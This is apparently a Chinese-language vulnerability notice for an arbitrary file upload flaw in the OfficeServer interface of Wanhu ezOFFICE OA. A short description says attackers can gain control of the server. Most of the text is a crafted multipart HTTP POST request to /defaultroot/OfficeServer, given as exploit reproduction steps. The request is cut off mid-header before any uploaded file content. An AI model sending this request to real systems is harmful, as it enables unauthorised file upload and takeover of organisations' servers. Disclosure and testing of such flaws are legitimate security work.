漏洞描述
万户OA(Office Automation)是一款企业级协同办公管理软件,旨在为企业提供全面的办公自动化解决方案。 万户ezOFFICE OfficeServer接口存在任意文件上传漏洞。攻击者可以通过此漏洞上传任意文件到目标服务器,导致攻击者可获取服务器控制权限。
漏洞复现
- 构造上传数据包。
POST /defaultroot/OfficeServer HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36
Content-Length: 583
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryk7uGGNUWdMDRBbBV
Cookie: OASESSIONID=x; LocLan=zh_CN;
------WebKitFormBoundaryk7uGGNUWdMDRBbBV
Content-Disposition: form-data; name="value1"
{"OPTION":"SAVEPDF"}
------WebKitFormBoundaryk7uGGNUWdMDRBbBV
Content-Disposi